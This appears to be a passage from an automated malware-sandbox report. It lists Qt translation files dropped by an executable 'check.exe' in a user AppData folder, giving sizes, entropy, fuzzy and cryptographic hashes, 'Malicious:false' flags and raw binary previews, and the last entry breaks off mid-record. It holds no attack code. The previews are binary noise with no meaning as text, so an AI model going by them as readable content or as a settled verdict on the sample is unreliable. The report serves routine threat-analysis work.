                                                                                                                                                                                                            Preview:<.d....!..`.......ru....v.....q.t.b.a.s.e._.r.u.....q.t.s.c.r.i.p.t._.r.u.....q.t.m.u.l.t.i.m.e.d.i.a._.r.u... .q.t.x.m.l.p.a.t.t.e.r.n.s._.r.u........)......,..
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):157
                                                                                                                                                                                                            Entropy (8bit):3.7731953311404336
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:j2wZC4C/3xRlAlHekE8lgp1MUM8lMlI+rwtbWlM5UllyIPldkOfll6kchn:CwS0+t8CIUM86IRt6KUlsoi2CVh
                                                                                                                                                                                                            MD5:24C179481B5EF574F33E983A62A34D53
                                                                                                                                                                                                            SHA1:0A67F1ED8CA4A5182F504806F8D47D499789F2D2
                                                                                                                                                                                                            SHA-256:B6ADFFD889FF96BF195CB997327E7D7005A815CAD67823FA6915A19C2D9BB668
                                                                                                                                                                                                            SHA-512:4757F3693120DAB2FBB7BCF1734EA20B3E3D9056B4B4E934A3129D660CFDC6C58B230459DB55912AF24AD5692BD221830BE0FF91E41D3EECD9439E79AC23FFE6
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......sk....v.....q.t.b.a.s.e._.s.k.....q.t.s.c.r.i.p.t._.s.k.....q.t.m.u.l.t.i.m.e.d.i.a._.s.k... .q.t.x.m.l.p.a.t.t.e.r.n.s._.s.k...........
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):228428
                                                                                                                                                                                                            Entropy (8bit):4.726953418955661
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3072:9zQH0hOtgmiAZu0eeAEv+v49JnnSmICgr3n7jhCQUeinqyU5UggtRLGrQ2LZO+Y1:RpUsSpGr36wsR
                                                                                                                                                                                                            MD5:D35A0FE35476BE8BD149CEE46E42B5E9
                                                                                                                                                                                                            SHA1:9F3C85C115A283E5230D1EEAD84C8CB73A71FA03
                                                                                                                                                                                                            SHA-256:C44E0313A9414CC0E490B65B0C036FA11BCA959353B228886547BC2C8492034F
                                                                                                                                                                                                            SHA-512:BEEB1751882AF081E80BE93F7464D4C6322B724EFA2CBD3E1CBE709181D380C1C57E770FA962BB706D6FCF4A8CB393E3F6E187C1F604F8CEEFB201CA3200BD1C
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......slB..<....*.......+.......@...C...A.......B...<...C.......D...2...E.......F...d...G.......H...W...I.......P.......Q.......R.......S...x...T.......U...n...V...%...W.......X.......Y.......]..g~...t...V.......f..................................;..G....;..[....;...q...;..ia...;... ...M..g....O.......O.......[..,e...........}..g....m..h........Q..(5......+;..2...+;...b..+;...i..+O..2...+O...4..1......E@......F.......H4......HY...%..H.......I.......I@......IA...9..IC......J...6...J.......J.......J...^...K...7...LD......L....n..PS...U..R.......T....=..Zr......[`...V..[`......\...!,..\...8U.._..."b.._.../h..1.......E...9......4...............5........e...................$...<...$..Z....[.......,.......y...L...y..].......H.......@.......J.......6........~..........E...O...E..+....E...~..............,1...%..8r...%...........^..............................5.......0..Gx...0.......0..P....0..h....0.......0.......5...^.......... D...... D......+....`..,.......,...-...<U
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):65851
                                                                                                                                                                                                            Entropy (8bit):4.7906769989650515
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:4u6DkpgyKmRmG15mGM6iFPi6Q/qTlOQZY2dKN8gKw:4u6DotUG1sGMZPi6Q/qTlO2Y2YKw
                                                                                                                                                                                                            MD5:0E85E0E0E7DDFE3D4BDE302F27047F9C
                                                                                                                                                                                                            SHA1:AE59348E0C2E4F86F99DA6CF5DAB3B7E92504B7C
                                                                                                                                                                                                            SHA-256:4B4B6FF7FD237C9DA0301B4946132E68653D15EB5FAF38E4C5FBFEBB12DD97F7
                                                                                                                                                                                                            SHA-512:8CAAB6C61E9FA26A3A289A9E4DC515D157B3092D6D4ED43861220261BD2B7CC79B35B52F9ADE4EF558B5385B37EAC14575420DD55C475F435BB95B6C1E2561B6
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`...B.......*.......+...i...]..6....;.......;..-f...;..:;...;..t....;.......M..64...O.......O...........q...}..6\...m..6........(..+;......+;..7...+;..=...+O......+O..7c..H4......H.......J.......K....F..LD...+..L.......PS...N..Zr......[`...7..[`...N..\...h4.._....J.._....k..1...>...............7........}......D............,...........*......i....................................%.......%..Fc.......6...0.......0..9....0..q....0..t....0.......0.......5.......5...... D..<}.. D..I...+.......,...=X..,.......<U..r...<U...n..<.......F...=...F....F..H5......H5..<...H5..J4..H5......f.......f...1V..f...:f..f...H;..f...t&..f.......f.......l..................8......;z..............<.......Je.......6...`...&...`...!.......9......1....e.......e..=....e..J..............g...y.....*.y.../.*.y..h..*.y.....*.T..J..*.0..'[.*.0...K.+F...q..+F.....+f......+f...A..+.z../..+.......+....i`.+.....X.+.z../..+.....S.+....7..+....Bi.+....K..+....q..+.......+......+...i..+.....+....0..F0i.....G.
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):110
                                                                                                                                                                                                            Entropy (8bit):3.630483009136986
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:j2wZC4C/7zl9lAlHekDN/01MULV4LlI+rwtbWlM+N:Cw5+wUGRIRt6n
                                                                                                                                                                                                            MD5:16CDF5B9D48B0F795D532A0D07F5C3A0
                                                                                                                                                                                                            SHA1:6E403C9096B3051973E2B681DFEBBC8DD024830D
                                                                                                                                                                                                            SHA-256:F574A2CFD4715885C3DBDF5AE60995252673BD94FDAA9586F7E0586F6C1AC0EE
                                                                                                                                                                                                            SHA-512:36A0431368010157EA8A45DCB00458076CCFFC08B37E443DEBD1AAD4A30C6080803337725A7A3DCBF2B410DC7BE89CEAF6C07C46F876E4EF5B08159E3BF38E6D
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......tr....R.....q.t.b.a.s.e._.t.r.....q.t.s.c.r.i.p.t._.t.r.....q.t.m.u.l.t.i.m.e.d.i.a._.t.r
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):164
                                                                                                                                                                                                            Entropy (8bit):4.021402900389864
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:j2wZC4C/ZlRlAlHekCczOp1MUKUt7KlI+rwtbWlM/cFKIPldkONRMugB:CwUl0+rjIUKUcIRt6M/oioM3
                                                                                                                                                                                                            MD5:9B101363343847FE42167183320C03F0
                                                                                                                                                                                                            SHA1:F0DF2CFF913E588B7CADFDABBF69F4F632B2F96A
                                                                                                                                                                                                            SHA-256:F1621E680E1642F9463E4B07E7E78B50F9A7BDB7C321D7302039CB3405CBDEA4
                                                                                                                                                                                                            SHA-512:DA14FDF8DB514902733CAAC492293873351C595EBBE0ACB0849BECE24AB822602EE64D01051F1426CD1FC13A95D8607302CF9B515D9806FDD3BD047087DE447C
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......uk....v.....q.t.b.a.s.e._.u.k.....q.t.s.c.r.i.p.t._.u.k.....q.t.m.u.l.t.i.m.e.d.i.a._.u.k... .q.t.x.m.l.p.a.t.t.e.r.n.s._.u.k........)......,..
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):117347
                                                                                                                                                                                                            Entropy (8bit):5.8593733369029195
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:51dXW89nqEFu54aekvRzHHSVuf8j2+/xc3lhnbsfdAoz/w:v9qEFeLekvRznSVHJG3lhn+djY
                                                                                                                                                                                                            MD5:0D02F0DE5A12BCB338B7042DFBDAACF3
                                                                                                                                                                                                            SHA1:B7C10D249D8986AD8C6939B370407D07227A39F5
                                                                                                                                                                                                            SHA-256:28CDE75D7B32C81FEF1D4630C37B79A61DEC24B357632FF00D6365A57D8BE43B
                                                                                                                                                                                                            SHA-512:21F02EBA36B4411921EA3C70310B8E454E8FC2B8F09957FD6A63B71689DC381F7A5E2C3BDF2810734D659AB43D8A7BD46EF6436ECC52F75C71B5F5C313365444
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......zhB..+....*.......+.......@.......A...8...B.......C.......D.......E...V...F.......G...L...H.......I...9...P.......Q...e...R...^...S.......T...T...U.......V...|...W.......X...o...Y.......]..4 ...;...2...;..,....;..8....;.......;.......M..4H...O.......O...........#...}..4p...m..4........N..(5......+;...f..+;..6Y..+;..<...+O...8..+O..6'..1......E@......F....Y..H4..."..HY..J...H.......I.......J.......J.......K....5..LD..._..L......PS...V..Q....6..R...N...W..../..Zr.....[`.....[`......\...lU.._......._....L..1...<........j......6...............B........I...$..K....$.......,...g...y...3.......A......r...........................9..L7......;w...E..5b...E...G.......5...%.......%..D........`......*........................0.......0..8W...0..}y...0...6...0.......0.......5.......5...... D..:... D..J...+....R..,...;...,......<U..~...<U......<......F...;...F......H5...i..H5..:...H5..Jk..H5...w..VE...[..f....u..f...0X..f...9...f...E...f.......f.......f....j..g....A..l.
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):141
                                                                                                                                                                                                            Entropy (8bit):3.7198292994386235
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:j2wZC4C/0N6xg/Rl/gl+kNXDelHrwtbWlMwTolIPldkOfDn:CwOO2+g6Mt63oloiUn
                                                                                                                                                                                                            MD5:ED4135D705AEF3D97F8BF6B8FF11F09C
                                                                                                                                                                                                            SHA1:308E2B8F74B863A61AD0B68F4A18ED06965EBEAA
                                                                                                                                                                                                            SHA-256:751ECDA0C33E061D91241268357FBD2F6B7F70A1116E714F28D22EFD61EC7A1A
                                                                                                                                                                                                            SHA-512:B6E6D00553A9C427130129B9D30E862028E549F372A832F0F05747C8E2A79E443F4932EC3AE177537C8BA00D26B5B6CB97D5B35426AB5229F6A468CA485BE0B1
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......zh_TW....n.....q.t.b.a.s.e._.z.h._.T.W...$.q.t.m.u.l.t.i.m.e.d.i.a._.z.h._.T.W...&.q.t.x.m.l.p.a.t.t.e.r.n.s._.z.h._.T.W
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):160017
                                                                                                                                                                                                            Entropy (8bit):5.35627970915292
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:XGlAMfkX1M0RdaCkR8lfv8vtc8EFrVYA2I4AJZWEWgHg1C8COvzHKHC6Jp9NV0V7:XUr0RACkIwDEpV1Lgf1ubtw3Bb
                                                                                                                                                                                                            MD5:A7E4D0BA0FC5DF07F62CC66EC9878979
                                                                                                                                                                                                            SHA1:21FD131B23BDD1BBA7BBB86F3ED5C83876F45638
                                                                                                                                                                                                            SHA-256:E03FE68D83201543698FD7FE267DD5DFC5BFD195147E74FF2F19AC3491401263
                                                                                                                                                                                                            SHA-512:D9E6B10506FCF20B5B783F011908083D9DF6C5DF88E21B10D07F53A01AD6506A4B921C85335A25BAE54E27BAD7D01B6E240D58FDEEAABC7FF32014EC120C2ECF
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......arB..2....*.......+.......@.......A.......B..._...C......D.......E......F.......G... ...H...D...I...h...P...C...Q...g...R......S.......T.......U.......V...x...W......X.......Y.......]..'=...s......t...........]...........;..'....;..(....;.......;.......M..'e...O.......O...9...........}..'........C...=......m..'....t..........!o..(5...Z..+;..5u..+;..c...+O......1...!...D@...8..E@.....H4...,..HY..QI..H.......IC......J....1..J.......J.......LD......L.......PS......QR...R..R...V2..T.......U....]..X.......Zr.....[`......\....t..]x......_......._.......yg......1...6....E..8V..............C............................$..RN...[...0...,.......y.......y...................K...........9..R....E.."............z.......................%..F;...D...[..................................!....5.......0...I...0.......0...5...0..#....5.......5...p..............W}.. D..(... D..P=..+.......<U......<U......<.......H5..(...H5..P...L.......VE......VE......V....B..f...JJ..f.......f.
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):165337
                                                                                                                                                                                                            Entropy (8bit):5.332219158085151
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:9ULiyUxPoT6qx+J7FJlaaMJnxjqxq+0Uiff0mbVeb7wiEwYuYqDKBkKHMXHCIMll:9ULpIVFnpwUiEujw27ncUQUz
                                                                                                                                                                                                            MD5:660413AD666A6B31A1ACF8F216781D6E
                                                                                                                                                                                                            SHA1:654409CDF3F551555957D3DBCF8D6A0D8F03A6C5
                                                                                                                                                                                                            SHA-256:E448AC9E3F16C29EB27AF3012EFE21052DAA78FABFB34CD6DFF2F69EE3BD3CDB
                                                                                                                                                                                                            SHA-512:C6AE4B784C3D302D7EC6B9CE7B27DDAF00713ADF233F1246CD0475697A59C84D6A86BAA1005283B1F89FCC0835FD131E5CF07B3534B66A0A0AA6AC6356006B8F
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......bg_BGB../....*..,....+..."...@...]...A.......B.......C.......D...P...E...!...F.......G.......H.......I.......P.......Q.......R...A...S...e...T.......U.......V.......W...1...X...U...Y...y...]..,....s...,...t...................P...;..+....;..-E...;..!....;..+....M..,Y...O...,...O...........*...}..,............=...Q...m..,....t...|......>...(5..1...+;..<...+;..o...+O...r..1...>...D@......E@......H4......HY..[...H.......IC......J....E..J....X..J.......LD......L....L..PS......QR.."...R...`...T....X..U.......X.......Zr...q..[`...`..\.......]x......_......._....T..yg.....1...=....E..?...............L(.......(...............'...$..\....[.......,...I...y...!...y...................S...........9..]%...E..5p...........z..!q...................%..O....D..................D.....8......:......?....5...&...0.......0.. ....0...c...0..5....5.......5..................b:.. D..-... D..Z...+.......<U......<U...0..<.......H5..-...H5..[...L.......VE..#a..VE..;...V.......f...T...f...!..
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):210159
                                                                                                                                                                                                            Entropy (8bit):4.666388181115542
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3072:P/DVhdlafzvZfeW+6kXEVjSVPzC3ceKdP2:xYf7UW+WjwP2
                                                                                                                                                                                                            MD5:B383F6D4B9EEA51C065E73ECB95BBD23
                                                                                                                                                                                                            SHA1:DD6C2C4B4888B0D14CEBFC86F471D0FC9B07FE42
                                                                                                                                                                                                            SHA-256:52E94FCC9490889B55812C5433D009B44BDC2DC3170EB55B1AF444EF4AAE1D7F
                                                                                                                                                                                                            SHA-512:9401940A170E22CE6515E3C1453C563D93869A3C3686C859491A1F8795520B61BF3F0BFE4687A7380C0CC0C75E25559354FDB5CEF916AF4C5B6CD9661464A54A
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......caB..7....*.......+.../...@..:P...A..:t...B..:....C..:....D..;=...E..<....F..<Z...G..<~...H..<....I..<....P..>....Q..>....R..?....S..?R...T..?v...U..?....V..?....W..@....X..@<...Y..@`...]../....s..1....t..........2s......#p...;.......;../....;..W....;..e+...M../3...O.......O..9.......J....}../]......8....=..9....m../....t..9Y.......S..(5..lB..+;.._...+;...=..+O..U...1.......D@..:...E@..?...H4...J..HY..~...H..."...IC...0..J....W..J....0..J.......LD..!...L...!f..PS..)...QR.."...R.......T...9~..U...9...U...z...X...>...Zr..E...[`...e..\...LD..]x..7U.._......._...M...yg..f...1...a....E..c....7.........U.......p........b.......4.......K...$.......[.......,.......y.......y...................^...........9...:...E...s...... (...z..":.......d......!....%..tQ...D.."......."......2......ve.....y...........5..#H...0...\...0..W+...0..';...0.......5..(....5..........)s.......... D..0w.. D..}...+...1...<?..5x..<U......<U..5...<...6@..H5..0...H5..~...L...9...VE..$...V...SV..f.
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):174701
                                                                                                                                                                                                            Entropy (8bit):4.87192387061682
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3072:5WjuhX0CVRaakGjW9E8SSOQfX/JlwVOMxrboRPqWxXfQvO7zjBf:5iFGj1QfXr8Gd
                                                                                                                                                                                                            MD5:C57D0DE9D8458A5BEB2114E47B0FDE47
                                                                                                                                                                                                            SHA1:3A0E777539C51BB65EE76B8E1D8DCE4386CBC886
                                                                                                                                                                                                            SHA-256:03028B42DF5479270371E4C3BDC7DF2F56CBBE6DDA956A2864AC6F6415861FE8
                                                                                                                                                                                                            SHA-512:F7970C132064407752C3D42705376FE04FACAFD2CFE1021E615182555F7BA82E7970EDF5D14359F9D5CA69D4D570AA9DDC46D48CE787CFF13D305341A3E4AF79
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......cs_CZB..3p...*..F....+.......@..!....@..Ef...A..!....A..E....B.."1...B..E....C.."U...C..E....D.."....D..F....E..#p...E..F)...F..#....F..FP...G..#....G..Fw...H..$....H..F....I..$6...I..F....P..&%...P..Gr...Q..&I...Q..G....R..&....R..G....S..&....S..H....T..&....T..H8...U..'....U..H_...V..'Z...V..H....W..'~...W..H....X..'....X..H....Y..'....Y..H....]..,....]..,....s.......t...9...............*...;.......;..+....;..1B...;......;..?x...;..N....;..iY...;..s3...M..,B...M..,....O.......O...w...O..rr...........}..,j...}..-....... 5...=.. ....m..,....m..-8...t.. .......ay..(5..TT..+;...A..+;..B...+;..u...+O......+O..=a..1...a...D@.."...E@..&m..E@..G...F...J...H4...=..HY..`...H.......I...J...IC......J....-..J.......J.......LD......L....(..PS.....QR.."S..R...e...T.... ..U......X.......Zr...g..[`......\......]x......_......._......._...v...yg......1...C....E..E...............=.......Q........................s...$..a....[.......,.......y.......y...y..............G..........
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):181387
                                                                                                                                                                                                            Entropy (8bit):4.755193800761075
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3072:XzswP2UvZ5aZ9jFTkmq/gnBNW/+PcWrqm2Vliz0DGdaS4KSLZjwTTgwUR0toT:j3m27AjCT
                                                                                                                                                                                                            MD5:859CE522A233AF31ED8D32822DA7755B
                                                                                                                                                                                                            SHA1:70B19B2A6914DA7D629F577F8987553713CD5D3F
                                                                                                                                                                                                            SHA-256:7D1E5CA3310B54D104C19BF2ABD402B38E584E87039A70E153C4A9AF74B25C22
                                                                                                                                                                                                            SHA-512:F9FAA5A19C2FD99CCD03151B7BE5DDA613E9C69678C028CDF678ADB176C23C7DE9EB846CF915BC3CC67ABD5D62D9CD483A5F47A57D5E6BB2F2053563D62E1EF5
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......daB..4....*..h....+......@...f...A.......B.......C.......D...U...E.......F...v...G.......H.......I.......P.......Q.......R...6...S...Z...T...~...U.......V.......W..."...X...F...Y...j...]..+....s.......t..................-...;..+....;..,....;../....;..;....M..+....O.......O...r...........}..,............=...8...m..,0...t...c......T...(5..B...+;..NH..+;..~H..+O..,...1...UP..D@......E@......H4...E..HY..j...H.......IC...#..J....J..J.......J.......LD......L....1..PS...B..QR......R...o...T.......U.......X.......Zr......[`...W..\....}..]x...[.._....-.._.......yg...e..1...O....E..R....7..........-!......]............................$..k....[...7...,.......y...c...y.................j4...........9..l8...E..p............z...;..................%..a....D...~.............-.....L......OH.....Uz...5.......0.......0...U...0.......0..p....5...7...5..L$..............p... D..-... D..i...+....@..<U.....<U.....<....S..H5..-2..H5..j$..L....B..VE.. ...VE..P...V...*...f...e...f.
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):220467
                                                                                                                                                                                                            Entropy (8bit):4.626295310482312
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3072:7w8go8+ph6JVB8XVXYWpSNEeg8+vaD+p4N8DDiEKugwGZulh15ce4M+4NsPYXCZW:88h8Sj286tTiDD
                                                                                                                                                                                                            MD5:40760A3456C9C8ABE6EA90336AF5DA01
                                                                                                                                                                                                            SHA1:B249AA1CBF8C2636CE57EB4932D53492E4CE36AC
                                                                                                                                                                                                            SHA-256:553C046835DB9ADEF15954FA9A576625366BA8BFD16637038C4BCD28E5EBACE1
                                                                                                                                                                                                            SHA-512:068E55F39B5250CC937E4B2BD627873132D201D351B9351BE703CD9B95D3BAFB4BD649CB4DF120A976D7C156DA679758D952CAC5E0523107244E517D323BC0C5
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......de_DEB..7....*.......+..3....@..R....A..R....B..S....C..S@...D..S....E..T]...F..T....G..T....H..T....I..U#...P..W....Q..W6...R..W....S..W....T..W....U..W....V..XG...W..Xk...X..X....Y..X....]..2%...s..J$...t..9R......J.......B....;..1....;..3....;..q....;.......M..2O...O.......O..X@......ia...}..2y......Q....=..Q....m..2....t..Q...........(5......+;..ev..+;......+O..oh..1....4..D@..R...E@..WZ..H4..4...HY...[..H...AY..IC..>o..J...>...J.......J...>6..LD..@A..L...@...PS..I...QR..#...R....h..T...W...U...Xh..U....~..X...]...Zr..e(..[`..)...\...j...]x..O..._....K.._...lI..yg...U..1...f....E..i....7..........o.......wG......6.......6.......8....$...n...[..8....,..9....y.......y..=................3......>....9.......E..."......?_...z..#d.......0......A%...%..z....D..A.......B......KP......2.............^...5..B....0.......0..p....0..F....0...}...5..G....5..........H........... D..3}.. D...O..+...Q...<?..Ti..<U......<U..T...<...U)..H5..3...H5......L...X...VE..%j..V...l..
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):16
                                                                                                                                                                                                            Entropy (8bit):4.0
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:j2wZC4n:CwZ
                                                                                                                                                                                                            MD5:BCEBCF42735C6849BDECBB77451021DD
                                                                                                                                                                                                            SHA1:4884FD9AF6890647B7AF1AEFA57F38CCA49AD899
                                                                                                                                                                                                            SHA-256:9959B510B15D18937848AD13007E30459D2E993C67E564BADBFC18F935695C85
                                                                                                                                                                                                            SHA-512:F951B511FFB1A6B94B1BCAE9DF26B41B2FF829560583D7C83E70279D1B5304BDE299B3679D863CAD6BB79D0BEDA524FC195B7F054ECF11D2090037526B451B78
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`...
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):165170
                                                                                                                                                                                                            Entropy (8bit):4.679910767547088
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:JVwzuvb+Ta64KQd84arHX5pxiVhA8QlOD/BnFNa8NsvsfFsfcoZtIx6F:JVwSTG4KqVaLX5pEVK7OJFczstgRtIx8
                                                                                                                                                                                                            MD5:C7C58A6D683797BFDD3EF676A37E2A40
                                                                                                                                                                                                            SHA1:809E580CDBF2FFDA10C77F8BE9BAC081978C102B
                                                                                                                                                                                                            SHA-256:4FFDA56BA3BB5414AB0482D1DDE64A6F226E3488F6B7F3F11A150E01F53FA4C8
                                                                                                                                                                                                            SHA-512:C5AED1A1AA13B8E794C83739B7FDDEAFD96785655C287993469F39607C8B9B0D2D8D222ECD1C13CF8445E623B195192F64DE373A8FB6FE43743BAF50E153CDA5
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......es_ESB../....*..*,...+...y...@.......A.......B.......C.......D...v...E...=...F.......G.......H.......I.......P.......Q... ...R...k...S.......T.......U.......V...1...W...U...X...y...Y.......]..+....s.......t...................c...;..+....;..,....;...%...;..#....;..-....M..+....O.......O...............}..,............=...]...m..,/...t..........A...(5..3...+;..<...+;..o...+O..!b..1...Ap..D@......E@...D..H4...-..HY..[F..H.......IC...%..J....L..J.......J.......LD......L....O..PS......QR..!...R...`K..T.......U....&..X.......Zr.....[`...h..\......]x...|.._....Y.._....A..yg......1...=....E..?a......!.......K........G...............R...$..\Q...[.......,...z...y.......y..................+............9..\....E..2............z.. ....................%..ON...D........................:......=B.....A....5...7...0.......0......0.."....0...,...0..3....5...}...5...Y..............a... D..-!.. D..Z6..+....0..<U...h..<U......<.......H5..-M..H5..Z...L.......VE.."...VE..>...V......
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):179941
                                                                                                                                                                                                            Entropy (8bit):4.720938209922096
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3072:lvdTgO2Yl97ZWnbgTLt/Tf9IlqAeiy5uWkYGM0wNCdRjSK2YUlUs:lvdkA9vh5uWkY0MK2YXs
                                                                                                                                                                                                            MD5:8472CF0BF6C659177AD45AA9E3A3247C
                                                                                                                                                                                                            SHA1:7B5313CDA126BB7863001499FB66FB1B56C255FC
                                                                                                                                                                                                            SHA-256:E47FE13713E184D07FA4495DDE0C589B0E8F562E91574A3558A9363443A4FA72
                                                                                                                                                                                                            SHA-512:DE36A1F033BD7A4D6475681EDC93CC7B0B5DCB6A7051831F2EE6F397C971B843E1C10B66C4FB2EFF2A23DC07433E80FBF7B95E62C5B93E121AB5AD88354D9CB8
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......fiB..38...*..ct...+......@.......A.......B.......C...@...D.......E...]...F.......G.......H.......I...#...P.......Q...6...R.......S.......T.......U.......V...G...W...k...X.......Y.......]..*....s...T...t.......................;..*....;..+....;..&....;..3....M..+!...O.......O...e...........}..+K...........=.......m..+w...t..........J...(5..9...+;..:y..+;..mW..+O..$...1...KY..D@......E@...Z..H4...l..HY..X&..H.......IC......J.......J...."..J......LD.....L.......PS...'..QR.. L..R...]...T.......U.......X.......Zr......[`......\.......]x......_....k.._....>..yg.. /..1...;....E..>....7..{(......%.......J........T.......&.......U...$..Y[...[......,...s...y.......y...a.......}......d...........9..Y....E..k'...........z...........V..........%..M....D...Q.......{......d.....A......E......K....5.......0.......0..&J...0.......0..k....5...*...5..I9.............._:.. D..,O.. D..W...+....9..<U...G..<U...*..<.......H5..,y..H5..W...H5......L....5..VE..!u..VE..E...V..."{..f.
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):166167
                                                                                                                                                                                                            Entropy (8bit):4.685212271435657
                                                                                                                                                                                                            Encrypted:false
